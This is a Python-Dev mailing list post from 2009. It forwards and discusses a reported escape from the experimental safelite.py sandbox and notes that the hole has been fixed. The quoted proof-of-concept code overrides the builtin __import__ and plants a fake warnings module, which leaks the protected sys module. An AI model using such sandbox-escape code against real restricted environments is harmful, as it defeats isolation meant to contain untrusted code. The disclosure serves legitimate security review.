Daniel emailed in the exploit below and it is pretty devastating. It takes advantage of the fact that the warnings framework in 2.6+ dynamically imports modules without being explicitly called!!
I've fixed this hole in safelite.py, but would be interested to know if there are other non-user-initiated dynamically imported modules? Thanks Daniel for bringing this to our attention! On Tue, Feb 24, 2009 at 4:46 AM, Daniel (ajax) Diniz <aja...@gmail.com> wrote: > Here's my attempt. Uses the builtin warnings module.You might need to > change 'args[1]' to 'args[2]' depending on your environment. > > I really don't like to post these to public MLs, but feel free to do > so if you think no harm may arise from this one ;) > > Daniel > ---- > > from safelite import FileReader > > # Let's build a fake module > warnings = __builtins__.__class__('warnings') > > # Fill it with deception > warnings.default_action = "ignore" > > # And provide a supporting thug > def __import__(*args): > try: > print "How nice:\n", args[1].keys() > global sys > sys = args[1]['sys'] > > except Exception, v: > print "Exception:", v > return warnings > > # Put the bogus module at the doorstep... > __builtins__.warnings = warnings > > # and have the thug replacing the doorman > __builtins__.__import__ = __import__ > > # An unsuspecting costumer passes by... > FileReader('safelite.py').seek(1.1) > > # ... and is brutally mugged :) > print sys > print dir(sys) > -- love, tav plex:espians/tav | t...@espians.com | +44 (0) 7809 569 369 http://tav.espians.com | http://twitter.com/tav | skype:tavespian _______________________________________________ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com